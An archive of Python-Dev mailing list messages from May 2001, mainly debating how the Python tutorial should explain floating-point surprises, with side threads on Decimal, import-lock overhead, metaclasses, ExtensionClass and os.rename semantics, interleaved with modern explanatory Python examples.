        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)

From guido@digicool.com Mon May 21 20:02:43 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 15:02:43 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT." References: Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com> > Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: > so long as we rely on the platform C to format floats, the output isn't > well-defined (the last digit or so can and will vary across boxes). I can't check right now, but I thought that this was pretty consistent across some common platforms? > I can certainly explain that this is so, and even why, but unsure > the tutorial is the right place for it.
In any case the tutorial > shouldn't be giving examples whose output is platform-dependent. > For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour > the tutorial for all such cases? Are you serious? This is something that the newbie who is in the least bit adventurous will run into anyway, so I don't think that not talking about this at all in the tutorial is fair or helpful. That just perpetuates the questions from newbies about "floating point is broken" -- since none of the tutorial examples prepare them for this. Since this is behavior that is ordinarily observed and perpetually perplexing, I think it *must* be treated in the tutorial. The tutorial doesn't have to have the full explanation -- maybe it's enough to say something like ``due to round-off errors you will sometimes see inexact results like 31.400000000000002; don't worry about this, you can use str() or "%g" (but not round()!) to strip redundant precision, and here's a URL for more info.'' Or maybe the full story can be an appendix. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz@rahul.net Mon May 21 21:09:04 2001 From: aahz@rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:09:04 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net> Guido van Rossum wrote: > > Or maybe the full story can be an appendix. Or maybe Decimal should go in the standard distribution? What kind of deadline do I have for finishing that to go into 2.2? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine.
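Guido's suggestion of using str() or "%g" to hide the noise, and Aahz's Decimal, can both be illustrated in modern Python. This is a sketch that assumes Python 3.1 or later, where repr() emits the shortest string that round-trips. It also uses the decimal module, which joined the standard library after this thread. Converting a float to Decimal is exact, so it shows the same stored value that Tim's f2ds spells out digit by digit.

```python
from decimal import Decimal

x = 10 * 3.14

print(repr(x))           # 31.400000000000002  (shortest string that round-trips)
print("%g" % x)          # 31.4  ("%g" keeps 6 significant digits)
print("%.17g" % 0.1)     # 0.10000000000000001  (17 digits always identify a double)

# Decimal(float) is an exact conversion: every digit of the stored binary value.
print(Decimal(x))

# Decimals built from strings use decimal arithmetic, so 0.1 * 3 is exact there.
print(Decimal("0.1") * 3 == Decimal("0.3"))   # True
print(0.1 * 3 == 0.3)                         # False
```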
From guido@digicool.com Mon May 21 21:35:10 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:35:10 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT." <20010521200904.05CAE99C81@waltz.rahul.net> References: <20010521200904.05CAE99C81@waltz.rahul.net> Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com> > > Or maybe the full story can be an appendix. > > Or maybe Decimal should go in the standard distribution? What kind of > deadline do I have for finishing that to go into 2.2? Adding Decimal to the distribution is fine. But using it by default for floating point literals and other floating point results is a different story. The PEP about that hasn't really been discussed enough to make a decision, but a conservative estimate is that this change won't be made in 2.2. So Decimal doesn't solve the problem the tutorial has. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz@rahul.net Mon May 21 21:42:15 2001 From: aahz@rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:42:15 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM Message-ID: <20010521204215.F216699C81@waltz.rahul.net> Guido van Rossum wrote: > >>> Or maybe the full story can be an appendix. >> >> Or maybe Decimal should go in the standard distribution? What kind of >> deadline do I have for finishing that to go into 2.2? > > Adding Decimal to the distribution is fine. But using it by default > for floating point literals and other floating point results is a > different story. The PEP about that hasn't really been discussed > enough to make a decision, but a conservative estimate is that this > change won't be made in 2.2. So Decimal doesn't solve the problem the > tutorial has. 
Wasn't thinking of going quite that far, only changing the tutorial to say something like, "If you want speed, use the hardware FP (which is directly supported by Python's floating literals); if you want accuracy, use Decimal." (Or FixedPoint, which is already in the distribution.) The full story needn't go in the Appendix; we can simply refer people to Cowlishaw and Kahan. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido@digicool.com Mon May 21 21:57:08 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:57:08 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT." <20010521204215.F216699C81@waltz.rahul.net> References: <20010521204215.F216699C81@waltz.rahul.net> Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com> [Aahz] > >>> Or maybe the full story can be an appendix. > >> > >> Or maybe Decimal should go in the standard distribution? What kind of > >> deadline do I have for finishing that to go into 2.2? [Guido] > > Adding Decimal to the distribution is fine. But using it by default > > for floating point literals and other floating point results is a > > different story. The PEP about that hasn't really been discussed > > enough to make a decision, but a conservative estimate is that this > > change won't be made in 2.2. So Decimal doesn't solve the problem the > > tutorial has. [Aahz] > Wasn't thinking of going quite that far, only changing the tutorial to > say something like, "If you want speed, use the hardware FP (which is > directly supported by Python's floating literals); if you want accuracy, > use Decimal." (Or FixedPoint, which is already in the distribution.) 
> The full story needn't go in the Appendix; we can simply refer people to > Cowlishaw and Kahan. I think that most people don't care about either speed or accuracy, but (being Python users) everybody cares about convenience, and convenience is using the built-in floating point literals. (Also, most other modules returning or using floating point numbers use binary floating point, e.g. the time module and of course the math module.) As long as the built-in literals are binary floating point, they are what 99% of the code uses, so we need to explain the pitfalls. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake@cj42289-a.reston1.va.home.com Mon May 21 22:47:35 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Mon, 21 May 2001 17:47:35 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental updates to the Python 2.2 documentation. From tim@digicool.com Mon May 21 22:57:22 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 21 May 2001 17:57:22 -0400 Subject: [Python-Dev] FP vs. tutorial Message-ID: Let's get some errors cleared up first: + FixedPoint is not in the distribution. + There is no PEP for Decimal. + Decimal f.p. is not more accurate than binary f.p. In fact, it's provably worse (but not by much). For the rest, + Yes, I'm serious about not including tutorial examples with platform-dependent output, unless they're explicitly meant to illustrate non-portable code. + Specific small examples notwithstanding, there is no uniformity across platforms in the last digit or so, because not even the IEEE- 754 standard requires that (while C is much sloppier than 754), and vendors generally don't implement anything better than the minimum necessary when it comes to f.p. (Sun is a notable exception). 
+ Happy to add text explaining the existence of surprises, and providing a URL. Do the floating-point morons on Python-Dev find this one comprehensible?: http://www.lahey.com/float.htm From guido@digicool.com Mon May 21 23:33:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 18:33:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT." References: Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com> > + Yes, I'm serious about not including tutorial examples with > platform-dependent output, unless they're explicitly meant to > illustrate non-portable code. Sure. Most examples can be rewritten to avoid platform-dependent output. But there should be one section on floating-point inaccuracies that shows a few of the kind of things you can expect on a typical platform, and 1.1 -> 1.1000000000000001 is pretty common. > + Specific small examples notwithstanding, there is no uniformity > across platforms in the last digit or so, because not even the IEEE- > 754 standard requires that (while C is much sloppier than 754), and > vendors generally don't implement anything better than the minimum > necessary when it comes to f.p. (Sun is a notable exception). So we'll have to add something like "the actual inexact output you see may differ from the inexact output in this example". > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I was thinking more of immortalizing this one: http://www.python.org/cgi-bin/moinmoin/RepresentationError This can serve as a nice self-contained section on f.p. surprises. --Guido van Rossum (home page: http://www.python.org/~guido/) From MarkH@ActiveState.com Tue May 22 00:06:39 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:06:39 +1000 Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com> Message-ID: > > + Happy to add text explaining the existence of surprises, and > > providing a URL. Do the floating-point morons on Python-Dev > > find this one comprehensible?: Hey - I resemble that remark! > > http://www.lahey.com/float.htm I quite liked the tone of this note. The Python-dev morons probably could make good sense of this, but only due to the relentless persistence of a certain timbot. If not for Tim, I would have forgotten completely about binary floating point versus decimal floating point. IIRC, me and about 40 other guys were desperately trying to get the attention of the single CS female on the day that lecture was given. (Actually, that is a pretty safe bet - _all_ lectures were spent that way :) However, without a little additional background I doubt the masses would be able to get too far into this. As Tim has said a few times, most people won't care - they just want it to work! > I was thinking more of immortalizing this one: > > http://www.python.org/cgi-bin/moinmoin/RepresentationError IMO, this is a little worse. There is less "background". Eg, in almost the first paragraph we see:

"""
Rewriting

 1      J
--- ~= ----
10     2**N
"""

And I went "huh? Where did J and N spring from?". Reading a bit further made it clear, but this document did seem a little impenetrable to floating point or maths newbies. It seems to me that the RepresentationError document was written for people with a decent background in maths - exactly the sort of people who _don't_ need such a document. Just-my-0.020000002-cents-worth ly, Mark.
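The equation 1/10 ~= J/2**N can be checked with nothing but integer arithmetic. This is a sketch that assumes IEEE-754 doubles with a 53-bit significand. It finds the N that gives J exactly 53 bits and rounds 2**N / 10 to the nearest integer J. The fractions module then confirms that J / 2**N is the value actually stored for 0.1.

```python
from fractions import Fraction

# Smallest N for which J = 2**N / 10 needs all 53 bits (2**52 <= J < 2**53).
N = 0
while 2**N // 10 < 2**52:
    N += 1
print(N)                      # 56

# J is the integer nearest to 2**N / 10.
q, r = divmod(2**N, 10)
J = q + 1 if r >= 5 else q    # r is 6 here, so q is rounded up
print(J)                      # 7205759403792794

stored = Fraction(0.1)        # exact value of the double nearest 0.1
print(stored == Fraction(J, 2**N))   # True
print(stored > Fraction(1, 10))      # True: the stored value is slightly too big
```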
From jeremy@digicool.com Tue May 22 00:13:09 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Mon, 21 May 2001 19:13:09 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <15113.41221.839653.822246@slothrop.digicool.com> We looked at the SecondImport test case today. It's a good test case for programs that execute "import os" in a time-critical inner loop :-). The primary reason it is slower is the import lock that was added after 1.5.2. The benchmark, run in isolation, spends about 6 percent of its time in the locking code. Since it only spends about 20 percent of its time actually doing imports, this is a pretty substantial cost. It seems possible to eliminate some of the cost by using a special marker in sys.modules that means: "This is not a module, but it's being loaded by another thread." But Guido doesn't sound interested in optimizing programs with imports in inner loops. Jeremy From tim@digicool.com Tue May 22 00:20:16 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 21 May 2001 19:20:16 -0400 Subject: [Python-Dev] test_mailbox now fails on Windows Message-ID: Appears to be because new code uses os.link, which doesn't exist on Windows. BTW, test_urllib2.py is still failing on Windows (and has been for a couple of weeks). From michel@digicool.com Tue May 22 00:42:49 2001 From: michel@digicool.com (Michel Pelletier) Date: Mon, 21 May 2001 16:42:49 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Mark Hammond wrote: > > > + Happy to add text explaining the existence of surprises, and > > > providing a URL. Do the floating-point morons on Python-Dev > > > find this one comprehensible?: > > Hey - I resemble that remark! As they say in the south, "mah-self" > > > http://www.lahey.com/float.htm > > I quite liked the tone of this note. 
The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. I liked the tone too, but it really goes into a lot of detail, there's this problem, and that one, oh and also *this* one and then there's *that* and the other thing, and after a while you get the impression that floating-point is for the insane. > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys were > desperately trying to get the attention of the single CS female on the day > that lecture was given. (Actually, that is a pretty safe bet - _all_ > lectures were spent that way :) The funny thing about that is we were in *Long Beach* (I assume you mean IPC9); if you wanted to see beautiful, scarcely clothed women in an acceptable public venue you wouldn't have had to go far, and they would have probably had more interesting "significant bits" (it's none of anyone's business where *I* was during the lectures ;). Someone on the Zope list proposed P4W (Python for Women). Poor, desperate souls. Obviously, P4E includes them too!! > > I was thinking more of immortalizing this one: > > > > http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. I agree. Equations should not be needed to explain this. -Michel From MarkH@ActiveState.com Tue May 22 00:47:06 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:47:06 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: > > The funny thing about that is we were in *Long Beach* (I > assume you mean IPC9), if you wanted to see beautiful, scarcely clothed Actually, I meant the computer science lectures all those years ago. Literally one female. And-not-much-has-changed ly, Mark.
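The kind of surprise the Lahey article catalogues is easy to reproduce with Python's binary double-precision floats, and the standard library can deal with some of them. This is a small sketch. math.fsum and math.isclose come from Python versions later than the one discussed here.

```python
import math

total = 0.0
for _ in range(10):
    total += 0.1          # 0.1 is already inexact, and every addition rounds again

print(total)              # 0.9999999999999999
print(total == 1.0)       # False

# fsum tracks the low-order bits lost by each addition and rounds once at the end.
print(math.fsum([0.1] * 10) == 1.0)   # True

# Comparing with a relative tolerance avoids testing floats for exact equality.
print(0.1 + 0.2 == 0.3)               # False
print(math.isclose(0.1 + 0.2, 0.3))   # True
```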
From guido@digicool.com Tue May 22 04:22:40 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:22:40 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000." References: Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com> Hi Alan, Thanks a lot for your input. I am cc'ing this reply to python-dev because I think my reply will be interesting for others. (Python-dev'ers: Alan expressed concern that introducing Smalltalk metaclasses would make Python unnecessarily complicated.) The way my thinking is currently going, it's not likely that Python will get a metaclass system similar to Smalltalk. However, unifying types and classes is useful for other reasons: please go to http://python.sourceforge.net/peps/ to read PEP 252 which explains how introspection can become simpler and more powerful by unifying the introspection mechanisms for types and classes. There will still be metaclasses, but the metaclasses will be less important than in Smalltalk. Class methods as commonly seen in Smalltalk are not high on my priority list, and the metaclass hierarchy won't be parallelling the regular class hierarchy. Instead, most metaclass programming will be done in C by programmers who want to implement alternative class policies. For example, the current class implementation gives each class a __dict__ for methods and class variables, and dynamically searches the class hierarchy for methods. An alternative inheritance policy could merge the __dict__ of the base class(es) with the __dict__ of the derived class at class declaration time: this would make method lookup a single dict lookup no matter how many levels of base classes are involved, at the cost of making classes less dynamic, because a change to a base class won't be seen in a derived class. 
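In present-day Python, metaclasses are written by subclassing `type`, so the merged-`__dict__` policy described above can be sketched in a few lines. This is a rough illustration, not Guido's design. `FlattenMeta`, `Base` and `Derived` are made-up names. The sketch walks each base's MRO, which only approximates Python's real method resolution order under multiple inheritance.

```python
class FlattenMeta(type):
    """Hypothetical metaclass: snapshot inherited attributes into each
    new class's own __dict__ when the class statement runs."""

    def __new__(mcls, name, bases, namespace):
        merged = {}
        # Visit ancestors from most generic to most specific, so nearer
        # classes overwrite farther ones (a simplification of the MRO).
        for base in reversed(bases):
            for klass in reversed(base.__mro__):
                if klass is object:
                    continue
                for key, value in vars(klass).items():
                    if not key.startswith("__"):   # skip __dict__, __module__, ...
                        merged[key] = value
        merged.update(namespace)   # the class body wins over anything inherited
        return super().__new__(mcls, name, bases, merged)


class Base(metaclass=FlattenMeta):
    def greet(self):
        return "hello from Base"


class Derived(Base):
    pass


# greet now lives directly in Derived.__dict__, so one dict lookup finds it.
print("greet" in vars(Derived))   # True

# The cost: later changes to Base are not seen by Derived.
Base.greet = lambda self: "changed"
print(Base().greet())      # changed
print(Derived().greet())   # hello from Base
```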
A metaclass controls method lookup and class construction, and thus a different metaclass can be used to change this policy for selected class hierarchies without changing the default policy (which would be backwards incompatible). Other policies under control of a metaclass could include overriding hooks for getattr and setattr, alternative mechanisms to store instance variables (e.g. slot-based rather than dict-based), and so on. While I think I can make it possible to write metaclasses in pure Python (by subclassing types.TypeType), I expect that most metaprogramming will be done in C, for performance reasons and for maximum flexibility. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Tue May 22 04:55:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:55:26 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT." References: Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com> > [Guido] > > I would like to break this down by defining the mapping between cmp() > > and rich comparisons. [Tim] > Good idea! Followed by many nitpicking questions about what I meant. As a matter of process, I think it's better to try to channel instead of challenge me. I just don't seem to have the concentration necessary to come up with all the details needed to make this worthy of a language definition, and you do. If you want a BDFL proclamation on currently gray areas in the rules, or a reversal of what the current implementation does in some cases, please draft a definition with a few leading questions. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Tue May 22 05:02:18 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 22 May 2001 00:02:18 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Mark Hammond, on http://www.lahey.com/float.htm] > I quite liked the tone of this note. 
The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. > > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys > were desperately trying to get the attention of the single CS female on > the day that lecture was given. (Actually, that is a pretty safe bet - > _all_ lectures were spent that way :) I remember guys like you. Well guess what? You ended up with a baby, while I'm known on two continents as the author of tabnanny.py. Ha! Revenge is a dish best eaten cold . > However, without a little additional background I doubt the masses would > be able to get too far into this. There's only so much you can say to unmotivated people who are also unwilling to learn. That's not my problem. Finding them a gentle intro from which they *could* learn isn't either, but typing a URL is easy enough that I don't mind. Here: I want to script MS Word with Python. I don't know COM and refuse to learn anything about it. I'd rather not install win32all either, and import statements confuse me. Why don't you make it easy for me? It's the same thing -- you can point them at what they need to learn if they're serious, else they're simply out of luck. [And on] >> http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. In one sense it's much worse: it's only trying to explain a single cause of fp surprises. OTOH, it explains it precisely while giving the reader the tools needed to do an exact analysis of any case of that particular class. The Lahey link touches on all the common sources of surprises, but leaves them fuzzy. > There is less "background". Eg, in almost the first paragraph we see: > > """ > Rewriting > 1 J > --- ~= ---- > 10 2**N > """ > > And I went "huh? Where did j and N spring from?". 
Reading a bit further > made it clear, but this document did seem a little impenetrable to > floating point or maths newbies. It did its job for them if it simply scared them <0.5 wink>. > It seems to me that the RepresentationError document was written for > people with a decent background in maths - There's nothing more complicated than integer division there. > exactly the sort of people who _don't_ need such a document. They actually do: regardless of math background, nothing about f.p. is obvious before studying f.p. as a subject in its own right. It's "not like" anything else, and in previous lives I spent a good chunk of my work time explaining the same stuff to doctorates. Mathematicians were actually the hardest audience at first, perhaps because they had the hardest time admitting they didn't already understand it; after getting beyond bruised professional pride, though, they were the easiest audience to bring up to speed. From tim@digicool.com Tue May 22 05:58:21 2001 From: tim@digicool.com (Tim Peters) Date: Tue, 22 May 2001 00:58:21 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Michel Pelletier, on http://www.lahey.com/float.htm] > I liked the tone too, but it really goes into a lot of detail, there's > this problem, and that one, oh and also *this* one and then there's > *that* and the other thing, and after a while you get the impression > that floating-point is for the insane. Using an unfamiliar power tool with sharp edges, and while blindfolded, is insane. [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > I agree. Equations should not be needed to explain this. There's exactly one equation on that page, saying that one ratio of two integers is approximately equal to another ratio of two integers. 
If that's too much for you, and you weren't satisfied with the *initial* hand-wavy explanation ("1/10 is not exactly representable as a binary fraction") either, then it's up to you to do better than the latter without actually saying anything useful : Q: Why is Python broken: >>> 0.1 0.10000000000000001 A: [your turn] From gward@python.net Tue May 22 14:41:57 2001 From: gward@python.net (Greg Ward) Date: Tue, 22 May 2001 09:41:57 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: ; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400 References: Message-ID: <20010522094157.A1245@gerg.ca> On 21 May 2001, Tim Peters said: > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I found this article more useful, interesting, and informative than whatever I learned about binary floating-point in my academic years. Good link, Tim. Two catches: * I can just barely follow the FORTRAN examples; I very much doubt the average Python newbie would have any more luck than me * I tried several of the FORTRAN examples in Python, and did not witness any of the gotchas they are meant to illustrate. Possibly it's just single-precision vs. double-precision difference, but Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 doesn't demonstrate the same gotchas as that article does. Greg -- Greg Ward - geek gward@python.net http://starship.python.net/~gward/ Ban the bomb -- save the world for conventional warfare. From skip@pobox.com (Skip Montanaro) Tue May 22 17:01:40 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Tue, 22 May 2001 11:01:40 -0500 Subject: [Python-Dev] type/class unification and ExtensionClass Message-ID: <15114.36196.4677.99240@beluga.mojam.com> I know Guido has recently been working on some of the type/class unification issues (PEPs 252 and 253). 
Will this affect ExtensionClass? In particular, will it go away or have to be reworked significantly for Python 2.2 or 2.3? The new PyGtk wrappers use the ExtensionClass module. I'm curious about how hard it would be to move away from ExtensionClass for these wrappers. My reading of PEP 253 suggests this shouldn't be too difficult. I'd ask Guido directly, but I figure other people on this list might also have useful input on the issue and/or be able to answer, saving him the time. At any rate, he will see it posted here just the same. Thx, Skip From guido@digicool.com Tue May 22 17:23:52 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 12:23:52 -0400 Subject: [Python-Dev] type/class unification and ExtensionClass In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT." <15114.36196.4677.99240@beluga.mojam.com> References: <15114.36196.4677.99240@beluga.mojam.com> Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com> > I know Guido has recently been working on some of the type/class unification > issues (PEPs 252 and 253). And I'm not done yet. :-) > Will this affect ExtensionClass? In particular, > will it go away or have to be reworked significantly for Python 2.2 or 2.3? Probably. Jim Fulton in particular asked me to work on this because he wants to phase out ExtensionClass. > The new PyGtk wrappers use the ExtensionClass module. I'm curious about how > hard it would be to move away from ExtensionClass for these wrappers. My > reading of PEP 253 suggests this shouldn't be too difficult. I don't think so either. > I'd ask Guido directly, but I figure other people on this list might also > have useful input on the issue and/or be able to answer, saving him the > time. At any rate, he will see it posted here just the same. 
--Guido van Rossum (home page: http://www.python.org/~guido/) From michel@digicool.com Tue May 22 22:44:09 2001 From: michel@digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 14:44:09 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Tim Peters wrote: > [Michel Pelletier, on http://www.lahey.com/float.htm] > > I liked the tone too, but it really goes into a lot of detail, there's > > this problem, and that one, oh and also *this* one and then there's > > *that* and the other thing, and after a while you get the impression > > that floating-point is for the insane. > > Using an unfamiliar power tool with sharp edges, and while blindfolded, is > insane. I should have been clearer: I liked the first couple of paragraphs for their descriptions, and there is certainly nothing wrong with the document as it stands, but such an explanation would be a bit too lengthy and boring to a typical fifth grader or photoshop guru going through the Tutorial and dabbling in programming for the very first time. > [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > > > I agree. Equations should not be needed to explain this. > > There's exactly one equation on that page, saying that one ratio of two > integers is approximately equal to another ratio of two integers. Who was it that said every equation will halve your audience? I agree with that, the tutorial should try to be as broad and simple as possible. > If that's > too much for you, and you weren't satisfied with the *initial* hand-wavy > explanation ("1/10 is not exactly representable as a binary fraction") > either, then it's up to you to do better than the latter without actually > saying anything useful : The latter is fine, although I think the first document hand-waves better.
-Michel From skip@pobox.com (Skip Montanaro) Tue May 22 22:54:42 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Tue, 22 May 2001 16:54:42 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform Message-ID: <15114.57378.887742.531145@beluga.mojam.com> Couldn't figure out why this message never generated any comment. Turns out it didn't reach the list because the host I sent it from (dynamic4.tttech.com) couldn't be resolved. I just noticed it in my errors mailbox and am sending it out again. ------------------------------------------------------------------------------ It was brought to my attention a week ago by a client that os.rename semantics differ between Unix and Windows. On Unix, if the destination file already exists it is silently deleted. On Windows, an exception is raised. I was able to verify this for Python 2.0 on Windows98. I assume nothing changed for 2.1, but I can't verify that. (Windows trashed my partition table and my Linux root partition while I was downloading 2.1. Consequently, I no longer run Windows. Take that, Bill...) I haven't checked the Mac yet (will do that when I get back to the US), but I think that os.rename should have the same semantics across all platforms. To the extent reasonably possible, I think this should also be true of other common functions exposed through the os module. On the (unsupportable) theory that to-date, more Python apps have been written and/or deployed on Unix-like systems and that where Windows apps are concerned, many developers will have added a thin wrapper to mimic the Unix semantics, I think less breakage would result if the Unix semantics were implemented in the Windows version. It appears that is what POSIX compliance would demand as well. Skip From fdrake@acm.org Tue May 22 22:55:29 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 17:55:29 -0400 (EDT) Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: References: Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com> Michel Pelletier writes: > as it stands, but such an explanation would be a bit too lengthy and > boring to a typical fifth grader or photoshop guru going through the > Tutorial and dabbling in programming for the very first time. But that's not the audience the Python Tutorial is targeted to -- readers are expected to be essentially competent in at least one "3rd generation" language. Maybe a few will shy away from a simple equation, but not so many. Those who do would do well to shy away from FP as well. ;-) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Tue May 22 23:04:11 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 18:04:11 -0400 (EDT) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> skip@pobox.com writes: > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were I don't know whether there are more deployed Python apps on Unix than on Windows (and I've no good idea about how to find out), but I think unifying the semantics one way or the other is a good thing. Regardless of which set of semantics is chosen. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh@python.net Tue May 22 23:07:12 2001 From: mwh@python.net (Michael Hudson) Date: 22 May 2001 23:07:12 +0100 Subject: [Python-Dev] FP vs.
